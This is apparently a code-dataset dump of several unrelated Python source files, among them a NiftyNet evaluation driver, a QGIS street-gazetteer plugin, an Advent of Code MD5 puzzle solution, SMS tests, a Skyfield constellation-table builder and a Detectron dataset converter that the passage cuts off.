code
stringlengths
658
1.05M
# -*- coding: utf-8 -*- """ This module defines a general procedure for running evaluations Example usage: app_driver = EvaluationApplicationDriver() app_driver.initialise_application(system_param, input_data_param) app_driver.run_application() system_param and input_data_param should be generated using: niftynet.utilities.user_parameters_parser.run() """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import time import itertools import pandas as pd import tensorflow as tf from niftynet.engine.application_factory import ApplicationFactory from niftynet.io.misc_io import touch_folder from niftynet.io.image_sets_partitioner import ImageSetsPartitioner FILE_PREFIX = 'model.ckpt' class EvaluationApplicationDriver(object): """ This class represents the application logic for evaluating a set of results inferred within NiftyNet (or externally generated) """ def __init__(self): self.app = None self.model_dir = None self.summary_dir = None self.session_prefix = None self.outputs_collector = None self.gradients_collector = None def initialise_application(self, workflow_param, data_param): """ This function receives all parameters from user config file, create an instance of application. :param workflow_param: a dictionary of user parameters, keys correspond to sections in the config file :param data_param: a dictionary of input image parameters, keys correspond to data properties to be used by image_reader :return: """ try: system_param = workflow_param.get('SYSTEM', None) net_param = workflow_param.get('NETWORK', None) infer_param = workflow_param.get('INFERENCE', None) eval_param = workflow_param.get('EVALUATION', None) app_param = workflow_param.get('CUSTOM', None) except AttributeError: tf.logging.fatal('parameters should be dictionaries') raise self.num_threads = 1 # self.num_threads = max(system_param.num_threads, 1) # self.num_gpus = system_param.num_gpus # set_cuda_device(system_param.cuda_devices) # set output TF model folders self.model_dir = touch_folder( os.path.join(system_param.model_dir, 'models')) self.session_prefix = os.path.join(self.model_dir, FILE_PREFIX) assert infer_param, 'inference parameters not specified' # create an application instance assert app_param, 'application specific param. not specified' self.app_param = app_param app_module = ApplicationFactory.create(app_param.name) self.app = app_module(net_param, infer_param, system_param.action) self.eval_param = eval_param data_param, self.app_param = \ self.app.add_inferred_output(data_param, self.app_param) # initialise data input data_partitioner = ImageSetsPartitioner() # clear the cached file lists data_partitioner.reset() if data_param: data_partitioner.initialise( data_param=data_param, new_partition=False, ratios=None, data_split_file=system_param.dataset_split_file) # initialise data input self.app.initialise_dataset_loader(data_param, self.app_param, data_partitioner) self.app.initialise_evaluator(eval_param) def run(self, application): """ This is the main application logic for evaluation. Computation of all metrics for all subjects is delegated to an Evaluator objects owned by the application object. The resulting metrics are aggregated as defined by the evaluation classes and output to one or more csv files (based on their 'group_by' headings). For example, per-subject metrics will be in one file, per-label-class metrics will be in another and per-subject-per-class will be in a third. :return: """ start_time = time.time() try: if not os.path.exists(self.eval_param.save_csv_dir): os.makedirs(self.eval_param.save_csv_dir) # iteratively run the graph all_results = application.evaluator.evaluate() for group_by, data_frame in all_results.items(): if group_by == (None,): csv_id = '' else: csv_id = '_'.join(group_by) with open(os.path.join(self.eval_param.save_csv_dir, 'eval_' + csv_id + '.csv'), 'w') as csv: csv.write(data_frame.reset_index().to_csv(index=False)) except KeyboardInterrupt: tf.logging.warning('User cancelled application') except RuntimeError: import sys import traceback exc_type, exc_value, exc_traceback = sys.exc_info() traceback.print_exception( exc_type, exc_value, exc_traceback, file=sys.stdout) finally: tf.logging.info('Cleaning up...') tf.logging.info( "%s stopped (time in second %.2f).", type(application).__name__, (time.time() - start_time))
# -*- coding: utf-8 -*- """ /*************************************************************************** Roadnet A QGIS plugin Roadnet is a plugin used for maintaining a local street gazetteer. ------------------- begin : 2014-12-09 git sha : $Format:%H$ copyright : (C) 2014 by thinkWhere email : [email protected] ***************************************************************************/ /*************************************************************************** * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * ***************************************************************************/ """ import os from PyQt4.QtCore import * from PyQt4.QtGui import ( QMessageBox, QPixmap, QIcon, QDesktopServices) from PyQt4.QtSql import QSqlDatabase from qgis.utils import * from qgis.core import * from esu_selector_tool import EsuSelectorTool from roadnet_dialog import ( AdminMetadataDlg, ChPwdDlg, AboutDlg, ExportLsgDlg, ExportLsgShapefileDlg, ExportPolyDlg, ExportsLorDlg, ExportsSwrfDlg, LsgLookupDlg, SrwrLookupDlg, StreetBrowserDlg, StreetReportsDlg, ValidationDlg) from generic_functions import ipdb_breakpoint from street_browser.street_browser import StreetBrowser from exports.exports import ( ExportDTF, ExportSRWR, ExportLOR, ExportLsgShp, ExportPoly) from admin.admin_menu import ExportStreetReport from admin.metadata import Metadata from admin.lsg_lookup import LsgLookUp from admin.srwr_lookup import SrwrLookup from admin.validation import Validation from admin.update_symbology import UpdateSymbology from gui.toolbar import RoadnetToolbar from geometry.esu_edit_handler import EsuEditHandler from geometry.rdpoly_edit_handler import RdpolyEditHandler from rn_menu.change_pwd import ChangePwd from rn_menu.about import About from ramp.ramp import Ramp import config import database import login import params_and_settings import roadnet_exceptions as rn_except import vector_layers __author__ = 'matthew.walsh' class Roadnet: """ QGIS plugin for managing street gazetteer data. thinkWhere 2015. """ def __init__(self, iface): """ Connect the plugin to the QGIS interface. This code is run every time that QGIS boots. :param iface: QGIS interface :return: """ if config.DEBUG_MODE: print('DEBUG_MODE: Roadnet.__init__ called') self.iface = iface # Save reference to the QGIS interface self.canvas = self.iface.mapCanvas() self.plugin_dir = os.path.dirname(__file__) self.clean_rdpoly = None self.db = None self.esu = None self.model = None self.rdpoly = None self.roadnet_started = False self.selector_tool = None self.street_browser = None self.street_browser_dk = None self.toolbar = None # Setup params file params_file_path = os.path.join(self.plugin_dir, 'Params.xml') self.params_file_handler = params_and_settings.ParamsFileHandler(params_file_path) try: self.params_file_handler.validate_params_file() except rn_except.QMessageBoxWarningError: # Parent of two different Params errors return self.params = self.params_file_handler.read_to_dictionary() # Connect to Ramp self.ramp = Ramp(self) def initGui(self): """ Set up the GUI components. This code is only run when the plugin has been activated in the plugin manager. :return: """ if config.DEBUG_MODE: print('DEBUG_MODE: initGui called') self.init_toolbar() self.toolbar.set_state('init') def start_roadnet(self): """ Start the plugin. Log in the user, connect to database, load layers, set toolbar up appropriately. """ if config.DEBUG_MODE: print('DEBUG_MODE: Starting roadNet') # Check the database if (self.params['RNDataStorePath'] == '') or (self.params['DbName'] == ''): if not self.run_change_db_path(): return db_path = os.path.join(self.params['RNDataStorePath'], self.params['DbName']) try: database.check_file(db_path) except IOError: if not self.run_change_db_path(): return # Log the user in login.login_and_get_role(self.params) self.toolbar.set_state(self.params['role']) if self.params['role'] == 'init': return # Open database and model self.db = database.open_working_copy(self.params) # params knows role database.update_geometry_statistics(self.db) self.model = database.get_model(self.db) # Add layers + connect edit signals, zoom to rdpoly self.add_rdpoly_layer() # Layer added as self.rdpoly self.add_esu_layer() # Layer added as self.esu + selector tool init self.params['session_includes_edits'] = False # Create the street browser instance if config.DEBUG_MODE: print('DEBUG_MODE: Initialising street browser') self.street_browser_dk = StreetBrowserDlg(self.params) self.street_browser_dk.setWindowFlags(Qt.WindowMaximizeButtonHint | Qt.WindowMinimizeButtonHint) rn_icon = QIcon() rn_icon.addPixmap(QPixmap(os.path.join(self.plugin_dir, "image", "rn_logo_v2.png"))) self.street_browser_dk.setWindowIcon(rn_icon) self.street_browser = StreetBrowser(self.iface, self.street_browser_dk, self.model, self.db, self.params) self.disable_srwr() # Hide SRWR tab self.street_browser.set_buttons_initial_state(self.params['role']) if config.DEBUG_MODE: print('DEBUG_MODE: Initialising street selector tool') # Initialise selector tool self.selector_tool = EsuSelectorTool(self.street_browser_dk, self.iface, self.esu, self.toolbar, self.db, self.street_browser.mapper) # Start RAMP if self.params['RAMP'] == 'true': self.ramp.start_ramp() self.roadnet_started = True def stop_roadnet(self): """ Stop the plugin. Close windows, disconnect and save databases, reset toolbars to initial state. """ if config.DEBUG_MODE: print('DEBUG_MODE: Stopping roadNet') # Stop RAMP, then reinitialise if self.ramp.ramp_started: self.ramp.stop_ramp() self.ramp = Ramp(self) # Unset the street selector and reset toolbar if self.iface.mapCanvas().mapTool(): # Tool is None if roadNet just stopped current_tool = self.iface.mapCanvas().mapTool().toolName() if current_tool == "ESU SELECTOR": self.selector_tool.unset_map_tool() # Reinitialise toolbar to reflect changes in RAMP settings self.toolbar.toolbar = None # Delete previous toolbar instance self.init_toolbar() # Remove layers for vlayer in [self.esu, self.rdpoly]: vlayer.layerDeleted.disconnect() # Disconnect auto-reload signal try: vector_layers.remove_spatialite_layer(vlayer, self.iface) except rn_except.RemoveNonExistentLayerPopupError: pass self.esu = None self.rdpoly = None # Reset street browser and other components self.street_browser_dk.close() self.street_browser_dk = None self.street_browser = None self.model = None # Disconnect database, and save if necessary connection_name = self.db.connectionName() self.db.close() self.db = None QSqlDatabase.removeDatabase(connection_name) if not config.DEBUG_MODE: database.update_sqlite_files(self.params) # Update params file self.params_file_handler.update_xml_file(self.params) self.roadnet_started = False def tr(self, message): return QCoreApplication.translate('Roadnet', message) def init_toolbar(self): # toolbar init if self.params['RAMP'] == 'true': with_ramp_flag = True else: with_ramp_flag = False self.toolbar = RoadnetToolbar(self.iface, self.plugin_dir, with_ramp_flag) # Roadnet tools self.toolbar.start_rn.triggered.connect(lambda: self.start_roadnet()) self.toolbar.stop_rn.triggered.connect(lambda: self.stop_roadnet()) self.toolbar.street_sel_btn.triggered.connect(self.activate_esu_selector) self.toolbar.sb_btn.triggered.connect(self.run_sb) self.toolbar.change_db_path.triggered.connect(self.run_change_db_path) self.toolbar.create_restore.triggered.connect(self.run_db_restore_point) self.toolbar.change_pwd.triggered.connect(self.run_change_pwd) self.toolbar.about.triggered.connect(self.run_about) self.toolbar.settings.triggered.connect(self.run_settings) # help menu self.toolbar.help.triggered.connect(self.run_help) # export menu self.toolbar.exp_lgs.triggered.connect(self.run_lsg_exp) self.toolbar.exp_srwr.triggered.connect(self.run_srwr_exp) self.toolbar.exp_list_roads.triggered.connect(self.run_lor_exp) self.toolbar.exp_maintain_poly.triggered.connect(self.run_export_poly) self.toolbar.exp_lsg_shp.triggered.connect(self.run_export_esu) # Admin tools self.toolbar.street_rpt.triggered.connect(self.run_street_report) self.toolbar.meta_menu.triggered.connect(self.run_metadata) self.toolbar.edit_lsg_lu.triggered.connect(self.run_lsg_lookup) self.toolbar.edit_srwr_lu.triggered.connect(self.run_srwr_lookup) self.toolbar.validation_rpt.triggered.connect(self.run_validation) self.toolbar.clean_rdpoly.triggered.connect(self.run_clean_rdpoly_symbology) # RAMP items if self.params['RAMP'] == 'true': self.toolbar.mcl_auto_number_btn.triggered.connect(self.ramp.run_mcl_auto_number) self.toolbar.mcl_select_btn.triggered.connect(self.ramp.run_ramp_mcl_select) self.toolbar.rdpoly_select_btn.triggered.connect(self.ramp.run_ramp_rdpoly_select) self.toolbar.load_layers.triggered.connect(self.ramp.run_ramp_load_layers) self.toolbar.road_length.triggered.connect(self.ramp.run_ramp_road_length) self.toolbar.export_wdm.triggered.connect(self.ramp.run_ramp_export_wdm) def activate_esu_selector(self): """ Fire on esu selector button. Sets reference to ESU Graphic layer and activates the street selector tool. """ self.iface.setActiveLayer(self.esu) self.iface.mapCanvas().setMapTool(self.selector_tool) def unload(self): """ Removes the plugin menu item and sb_icon from QGIS GUI """ if config.DEBUG_MODE: print('DEBUG_MODE: unload called') lock_file = os.path.join(self.params['RNDataStorePath'], 'RNLock') if os.path.isfile(lock_file): os.remove(lock_file) if self.roadnet_started: self.stop_roadnet() if self.toolbar: # No toolbar exists if Params file was missing self.toolbar.toolbar = None def run_db_restore_point(self): """ Saves a copy of the working database as <database>_restore.sqlite. :return: void """ database.db_restore_point(self.params) def run_change_db_path(self): """ function that shows the db path change dialog window :return: [bool] True if the user clicks on OK, False if on Cancel """ return database.change_db_path(self.params, self.params_file_handler) def run_change_pwd(self): """ function that changes the access password for the current user :return: """ self.change_pwd_dlg = ChPwdDlg() change_pwd = ChangePwd(self.change_pwd_dlg, self.iface, self.db, self.plugin_dir, self.params) self.change_pwd_dlg.exec_() del change_pwd def run_about(self): """ function that shows the about window with information on plug-in version copyright and licensing """ about_dlg = AboutDlg() about_dlg.setWindowFlags(Qt.CustomizeWindowHint | Qt.WindowTitleHint) about = About(about_dlg, self.plugin_dir) about_dlg.exec_() del about def run_sb(self): """ Shows the street browser dialog window, if its already visible then raise to front and give focus. """ self.street_browser_dk.signals.closed_sb.connect(self.street_browser.remove_coords) if self.street_browser_dk.isVisible(): self.street_browser_dk.activateWindow() if self.street_browser_dk.isMinimized(): self.street_browser_dk.showNormal() else: self.street_browser_dk.show() def run_lsg_exp(self): """ function that shows the export LSG dialog window """ self.export_lsg_dk = ExportLsgDlg() self.export_lsg = ExportDTF(self.iface, self.export_lsg_dk, self.params, self.db) self.export_lsg_dk.exec_() def run_srwr_exp(self): """ function that shows the export SRWR dialog window """ self.export_swrf_dk = ExportsSwrfDlg() self.export_srwr = ExportSRWR(self.iface, self.export_swrf_dk, self.params, self.db) self.export_swrf_dk.exec_() def run_lor_exp(self): """ function that shows the export list of roads dialog window """ self.export_lor_dk = ExportsLorDlg() self.export_lor = ExportLOR(self.iface, self.export_lor_dk, self.db) self.export_lor_dk.exec_() def run_export_esu(self): """ function that exports ESU streets line layer """ self.iface.setActiveLayer(self.esu) self.export_lsg_shp_dk = ExportLsgShapefileDlg() self.export_lsg_shp = ExportLsgShp(self.iface, self.export_lsg_shp_dk, self.db, self.params) self.export_lsg_shp_dk.exec_() def run_export_poly(self): """ function that exports polygons layer :return: """ self.iface.setActiveLayer(self.rdpoly) self.export_polgons_dk = ExportPolyDlg() self.export_poly = ExportPoly(self.iface, self.export_polgons_dk, self.db) self.export_polgons_dk.exec_() def run_street_report(self): """ function that shows the run street report dialog window """ self.street_reports_dlg = StreetReportsDlg() self.export_street_reports = ExportStreetReport( self.iface, self.db, self.street_reports_dlg, self.params) self.street_reports_dlg.exec_() def run_metadata(self): """ Initialise and display the metadata information window :return: """ # Initialise metadata each time dialog is launched self.admin_metadata_dlg = AdminMetadataDlg() self.metadata = Metadata(self.iface, self.db, self.admin_metadata_dlg, self.params) self.admin_metadata_dlg.show() def run_lsg_lookup(self): """ Open the LSG lookup definition dialog window :return: """ self.lsg_lookup_dlg = LsgLookupDlg() self.lsg_lookup = LsgLookUp(self.iface, self.db, self.lsg_lookup_dlg) self.lsg_lookup_dlg.show() def run_srwr_lookup(self): """ Open the SRWR lookup definition dialog window """ self.srwr_lookup_dlg = SrwrLookupDlg() self.srwr_lookup = SrwrLookup(self.iface, self.db, self.srwr_lookup_dlg) self.srwr_lookup_dlg.exec_() def run_validation(self): """ function that runs the validation report window :return: """ self.validation_dlg = ValidationDlg() self.validation = Validation(self.iface, self.db, self.validation_dlg, self.plugin_dir, self.params) self.validation_dlg.exec_() def run_clean_rdpoly_symbology(self): """ Run the road polygon symbology cleanup tool. :return: """ self.clean_rdpoly = UpdateSymbology(self.db, self.rdpoly, self.esu) self.clean_rdpoly.show_symbology_dlg() def run_help(self): """ Open the help pdf in the default web browser """ help = QDesktopServices() help_url = QUrl("http://www.thinkwhere.com/index.php/download_file/240/") if not help.openUrl(help_url): no_browser_msg_box = QMessageBox(QMessageBox.Warning, " ", "roadNet cannot find a web browser " "to open the help page", QMessageBox.Ok, None) no_browser_msg_box.setWindowFlags(Qt.CustomizeWindowHint | Qt.WindowTitleHint) no_browser_msg_box.exec_() return def run_settings(self): """ Show the settings dialog """ updated_params = params_and_settings.update_via_dialog(self.params) self.params_file_handler.update_xml_file(updated_params) def disable_srwr(self): """ Initially make the SRWR tab invisible. """ self.street_browser_dk.ui.srwrRecordsGroupBox.setVisible(False) def add_rdpoly_layer(self): """ Load Road Polygon layer from spatialite file. Connect triggers for editing, and so they can reload themselves if removed. """ if config.DEBUG_MODE: print("DEBUG_MODE: Adding Road Polygon layer.") self.rdpoly = vector_layers.add_styled_spatialite_layer( 'rdpoly', 'Road Polygons', self.params['working_db_path'], self.iface, style='rdpoly') self.rdpoly.editingStarted.connect(self.editing_rdpoly_begin) self.rdpoly.editingStopped.connect(self.editing_rdpoly_end) self.rdpoly.layerDeleted.connect(self.add_rdpoly_layer) def add_esu_layer(self): """ Load ESU layer from spatialite file. Connect triggers for editing, and so they can reload themselves if removed. """ if config.DEBUG_MODE: print("DEBUG_MODE: Adding ESU layer.") self.esu = vector_layers.add_styled_spatialite_layer( 'esu', 'ESU Graphic', self.params['working_db_path'], self.iface, style='esu') self.esu.editingStarted.connect(self.editing_esu_begin) self.esu.editingStopped.connect(self.editing_esu_end) self.esu.layerDeleted.connect(self.add_esu_layer) # Reload if removed # Create the selector tool instance if self.roadnet_started: if config.DEBUG_MODE: print('DEBUG_MODE: Re-initialising street selector tool') # Recreate selector tool self.selector_tool = EsuSelectorTool(self.street_browser_dk, self.iface, self.esu, self.toolbar, self.db, self.street_browser.mapper) def editing_esu_begin(self): """ Creates classes that listen for various edit events on the Esu layer """ if self.params['AutoSplitESUs'] == 'true': handle_intersect_flag = True else: handle_intersect_flag = False # Disable attributes dialog QSettings().setValue( '/qgis/digitizing/disable_enter_attribute_values_dialog', True) self.esu_edit_handler = EsuEditHandler( self.iface, self.esu, self.db, self.params, handle_intersect_flag) def editing_esu_end(self): self.esu_edit_handler = None self.params['session_includes_edits'] = True # Re-enable attributes dialog QSettings().setValue( '/qgis/digitizing/disable_enter_attribute_values_dialog', False) if self.esu.isEditable() is True: # Rolling back changes ends destroys geometry_handler class but # layer remains editable. In this case, recreate it. self.editing_esu_begin() def editing_rdpoly_begin(self): if self.params['PreventOverlappingPolygons'] == 'true': handle_intersect_flag = True else: handle_intersect_flag = False # Disable attributes dialog QSettings().setValue( '/qgis/digitizing/disable_enter_attribute_values_dialog', True) self.rdpoly_edit_handler = RdpolyEditHandler( self.iface, self.rdpoly, self.db, self.params, handle_intersect_flag) def editing_rdpoly_end(self): self.rdpoly_edit_handler = None self.params['session_includes_edits'] = True # Re-enable attributes dialog QSettings().setValue( '/qgis/digitizing/disable_enter_attribute_values_dialog', False) if self.rdpoly.isEditable() is True: # Rolling back changes ends destroys geometry_handler class but # layer remains editable. In this case, recreate it. self.editing_rdpoly_begin() def get_multiple_part_esus(self): """ Helper function, not used in roadNet, that can be called manually to list ESUs whose geometries have more than one part. :return: list of esu ids """ esu_ids = [] for f in self.esu.getFeatures(): g = QgsGeometry(f.geometry()) # Make a copy if g.deletePart(1): esu_ids.append(f['esu_id']) return esu_ids
""" Solution to Day 14 from: http://adventofcode.com/2016/day/14 --- Day 14: One-Time Pad --- In order to communicate securely with Santa while you're on this mission, you've been using a one-time pad that you generate using a pre-agreed algorithm. Unfortunately, you've run out of keys in your one-time pad, and so you need to generate some more. To generate keys, you first get a stream of random data by taking the MD5 of a pre-arranged salt (your puzzle input) and an increasing integer index (starting with 0, and represented in decimal); the resulting MD5 hash should be represented as a string of lowercase hexadecimal digits. However, not all of these MD5 hashes are keys, and you need 64 new keys for your one-time pad. A hash is a key only if: It contains three of the same character in a row, like 777. Only consider the first such triplet in a hash. One of the next 1000 hashes in the stream contains that same character five times in a row, like 77777. Considering future hashes for five-of-a-kind sequences does not cause those hashes to be skipped; instead, regardless of whether the current hash is a key, always resume testing for keys starting with the very next hash. For example, if the pre-arranged salt is abc: The first index which produces a triple is 18, because the MD5 hash of abc18 contains ...cc38887a5.... However, index 18 does not count as a key for your one-time pad, because none of the next thousand hashes (index 19 through index 1018) contain 88888. The next index which produces a triple is 39; the hash of abc39 contains eee. It is also the first key: one of the next thousand hashes (the one at index 816) contains eeeee. None of the next six triples are keys, but the one after that, at index 92, is: it contains 999 and index 200 contains 99999. Eventually, index 22728 meets all of the criteria to generate the 64th key. So, using our example salt of abc, index 22728 produces the 64th key. Given the actual salt in your puzzle input, what index produces your 64th one-time pad key? """ import hashlib import re def generates_key(salt, index): """Returns true if the hash of salt and the index contains one character three times in a row, and one of the next 1000 hashes with the same salt and an increasing index contains the same character five times in a row""" starting_hash = hashlib.md5(str.encode(salt + str(index))).hexdigest() match = re.search(r'([a-z0-9])\1\1', starting_hash) if match is None: return False repeat_target = match[1] + match[1] + match[1] + match[1] + match[1] for i in range(index + 1, index + 1001): new_hash = hashlib.md5(str.encode(salt + str(i))).hexdigest() if repeat_target in new_hash: return True return False def main(): """Execution of solution""" salt = 'abc' index = 0 key_count = 0 while key_count < 64: if generates_key(salt, index): key_count += 1 index += 1 print(index - 1) if __name__ == "__main__": main()
############################################################################## # # OSIS stands for Open Student Information System. It's an application # designed to manage the core business of higher education institutions, # such as universities, faculties, institutes and professional schools. # The core business involves the administration of students, teachers, # courses, programs and so on. # # Copyright (C) 2015-2020 Université catholique de Louvain (http://www.uclouvain.be) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # A copy of this license - GNU General Public License - is available # at the root of the source code of this program. If not, # see http://www.gnu.org/licenses/. # ############################################################################## from typing import List from django.db import transaction from program_management.ddd.command import PostponeProgramTreeCommand, CopyProgramTreeToNextYearCommand from program_management.ddd.domain.program_tree import ProgramTreeIdentity from program_management.ddd.domain.service.calculate_end_postponement import CalculateEndPostponement from program_management.ddd.repositories import program_tree_version as tree_version_repo from program_management.ddd.service.write import copy_program_tree_service @transaction.atomic() def postpone_program_tree( postpone_cmd: 'PostponeProgramTreeCommand' ) -> List['ProgramTreeIdentity']: identities_created = [] # GIVEN from_year = postpone_cmd.from_year end_postponement_year = CalculateEndPostponement.calculate_end_postponement_year_program_tree( identity=ProgramTreeIdentity(code=postpone_cmd.from_code, year=postpone_cmd.from_year), repository=tree_version_repo.ProgramTreeVersionRepository() ) # WHEN while from_year < end_postponement_year: identity_next_year = copy_program_tree_service.copy_program_tree_to_next_year( copy_cmd=CopyProgramTreeToNextYearCommand( code=postpone_cmd.from_code, year=from_year, ) ) # THEN identities_created.append(identity_next_year) from_year += 1 return identities_created
# -*- coding: utf-8 -*- ''' SMS tests. ''' from dci_notify.extensions import mail from dci_notify.sms import split_msg, send_sms class TestSplitMessage: def test_split_msg_one_chunk(self): msg = 'a' * 130 chunks = split_msg(msg) assert len(chunks) is 1 def test_split_msg_multi_chunk(self): msg = 'a' * 500 chunks = split_msg(msg) assert len(chunks) is 4 def test_split_msg_line_breaks(self): msg = 'a' * 120 + '\n' + 'b' * 40 chunks = split_msg(msg) assert len(chunks) is 2 assert len(chunks[0]) == 120 def test_split_msg_one_line(self): msg = 'a' * 160 + 'b' * 20 chunks = split_msg(msg) assert len(chunks) is 2 class TestSendMessage: def test_send_sms_single_message(self, app): with mail.record_messages() as outbox: send_sms(carrier='verizon', number=5551112222, message='message', subject='subject') assert len(outbox) is 1 assert outbox[0].subject == 'subject' assert outbox[0].body == 'message' def test_send_sms_multiple_messages(self, app): with mail.record_messages() as outbox: send_sms(carrier='verizon', number=5551112222, message='m' * 300, subject='subject') assert len(outbox) is 3 assert outbox[0].subject == 'subject' assert outbox[0].body == 'm' * 130 def test_send_sms_with_conn(self, app): with mail.record_messages() as outbox: with mail.connect() as conn: send_sms(carrier='verizon', number=5551112222, message='m' * 300, subject='subject', conn=conn) assert len(outbox) is 3
#!/usr/bin/env python3 """Build Skyfield's internal table of constellation boundaries. See: https://iopscience.iop.org/article/10.1086/132034/pdf http://cdsarc.u-strasbg.fr/viz-bin/Cat?VI/42 """ import argparse import os import sys import numpy as np from numpy import array, searchsorted from skyfield import api URL = 'http://cdsarc.u-strasbg.fr/ftp/VI/42/data.dat' def main(): with api.load.open(URL) as f: lines = list(f) unique_ra = set() unique_dec = set() fracs = set() boundaries = [] for line in lines: fields = line.split() ra_low = extend(fields[0]) ra_up = extend(fields[1]) de_low = extend(fields[2]) const = fields[3].decode('ascii') print(ra_low, const) #print(ra_int(ra_low)) #fracs.add(fields[0].split(b'.')[1]) unique_ra.add(ra_low) unique_ra.add(ra_up) unique_dec.add(de_low) fracs.add(const) boundaries.append([ra_low, ra_up, de_low, const]) print(sorted(fracs)) print('constellations:', len(fracs)) print('unique_ra:', len(unique_ra)) print('unique_dec:', len(unique_dec)) sorted_consts = array(sorted(fracs)) sorted_ra = array(sorted(unique_ra)) sorted_dec = array(sorted(unique_dec)) assert sorted_ra[0] == 0 assert sorted_ra[-1] == 24 assert sorted_dec[0] == -90 assert sorted_dec[-1] == 88 sorted_ra = sorted_ra[1:] sorted_dec = sorted_dec[1:] print('bytes', sorted_ra.nbytes) print('bytes', sorted_dec.nbytes) #grid = [[5] * len(unique_dec)] * len(unique_ra) #grid = array(grid, 'i1') row = [-128] * len(sorted_ra) grid = [] i = 0 de = -90.0 for ra_low, ra_up, de_low, const in boundaries[::-1]: if de_low > de: grid.append(row) row = list(row) de = de_low i0 = searchsorted(sorted_ra, ra_low, side='right') i1 = searchsorted(sorted_ra, ra_up, side='right') c = searchsorted(sorted_consts, const) # if ra_up == 24.0: # print(sorted_ra, ra_low, ra_up) # print(i0, i1, '?', len(row)) # exit() for j in range(i0, i1): row[j] = c grid.append(row) grid.append(row) grid.append(row) #grid = grid[::-1] grid = array(grid, 'i1').T assert len(sorted_ra) == 236 assert searchsorted(sorted_ra, 0, side='right') == 0 assert searchsorted(sorted_ra, 0.06, side='right') == 0 assert searchsorted(sorted_ra, 0.07, side='right') == 1 assert searchsorted(sorted_ra, 23.8, side='right') == 234 assert searchsorted(sorted_ra, 23.9, side='right') == 235 assert searchsorted(sorted_ra, 24.0, side='right') == 236 sorted_ra = sorted_ra[:-1] assert len(sorted_ra) == 235 assert searchsorted(sorted_ra, 0) == 0 assert searchsorted(sorted_ra, 0.06) == 0 assert searchsorted(sorted_ra, 0.07) == 1 assert searchsorted(sorted_ra, 23.8) == 234 assert searchsorted(sorted_ra, 23.9) == 235 assert searchsorted(sorted_ra, 24.0) == 235 print(sorted_consts[57]) print(grid) print('shape', grid.shape) print('bytes', grid.nbytes) for ra, dec in [(0, 0), (0.1, 0.1), (5.59, -5.45), (16, 80), (16, 90), (16, -90), (24, 360), ([0, 16], [0, 80])]: c = compute_constellation(ra, dec, sorted_ra, sorted_dec, sorted_consts, grid) print('=', ra, dec, c) path = os.path.dirname(__file__) + '/../skyfield/data/constellations' np.savez_compressed( path, sorted_ra=sorted_ra, sorted_dec=sorted_dec, radec_to_index=grid, indexed_abbreviations=sorted_consts, ) def compute_constellation(ra, dec, sorted_ra, sorted_dec, sorted_consts, grid): i = searchsorted(sorted_ra, ra) j = searchsorted(sorted_dec, dec) #print(dec, sorted_dec) #print(ra, sorted_ra) print("ra,dec", ra, dec) print("i,j", i, j) return sorted_consts[grid[i, j]] def extend(s): """Return a float for `s` extended to machine precision. Takes a string like '13.6667', passes it to `float()`, and snaps it to the nearest whole second. """ return round(3600 * float(s)) / 3600. # Some discarded code that I might want to revive someday: how to grow # and shrink a list of segments as new ones supersede old ones on the # way down the sky. def segment_experiment(): assert insert_segment([0, 4, 7, 10], 0, 3) == [0, 3, 4, 7, 10] assert insert_segment([0, 4, 7, 10], 4, 7) == [0, 4, 7, 10] assert insert_segment([0, 4, 7, 10], 6, 9) == [0, 4, 6, 9, 10] assert insert_segment([0, 4, 7, 10], 7, 10) == [0, 4, 7, 10] assert insert_segment([0, 4, 7, 10], 0, 10) == [0, 10] assert insert_segment([0, 10], 4, 7) == [0, 4, 7, 10] assert insert_segment([], 4, 7) == [4, 7] segments = [] n = 0 for ra_low, ra_up, de_low in boundaries[::-1]: segments = insert_segment(segments, ra_low, ra_up) print(len(segments), end=' ') n += len(segments) print(n) def insert_segment(ra_list, ra_low, ra_up): new = [] i = 0 while i < len(ra_list) and ra_list[i] < ra_low: new.append(ra_list[i]) i += 1 new.append(ra_low) new.append(ra_up) while i < len(ra_list) and ra_list[i] <= ra_up: i += 1 while i < len(ra_list): new.append(ra_list[i]) i += 1 return new if __name__ == '__main__': main()
#!/usr/bin/env python # Copyright (c) 2017-present, Facebook, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################## from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import argparse import h5py import json import os import imageio import sys import cityscapesscripts.evaluation.instances2dict_with_polygons as cs import detectron.utils.segms as segms_util import detectron.utils.boxes as bboxs_util def parse_args(): parser = argparse.ArgumentParser(description='Convert dataset') parser.add_argument( '--dataset', help="cocostuff, cityscapes", default=None, type=str) parser.add_argument( '--outdir', help="output dir for json files", default=None, type=str) parser.add_argument( '--datadir', help="data dir for annotations to be converted", default=None, type=str) if len(sys.argv) == 1: parser.print_help() sys.exit(1) return parser.parse_args() def convert_coco_stuff_mat(data_dir, out_dir): """Convert to png and save json with path. This currently only contains the segmentation labels for objects+stuff in cocostuff - if we need to combine with other labels from original COCO that will be a TODO.""" sets = ['train', 'val'] categories = [] json_name = 'coco_stuff_%s.json' ann_dict = {} for data_set in sets: file_list = os.path.join(data_dir, '%s.txt') images = [] with open(file_list % data_set) as f: for img_id, img_name in enumerate(f): img_name = img_name.replace('coco', 'COCO').strip('\n') image = {} mat_file = os.path.join( data_dir, 'annotations/%s.mat' % img_name) data = h5py.File(mat_file, 'r') labelMap = data.get('S') if len(categories) == 0: labelNames = data.get('names') for idx, n in enumerate(labelNames): categories.append( {"id": idx, "name": ''.join(chr(i) for i in data[ n[0]])}) ann_dict['categories'] = categories imageio.imsave( os.path.join(data_dir, img_name + '.png'), labelMap) image['width'] = labelMap.shape[0] image['height'] = labelMap.shape[1] image['file_name'] = img_name image['seg_file_name'] = img_name image['id'] = img_id images.append(image) ann_dict['images'] = images 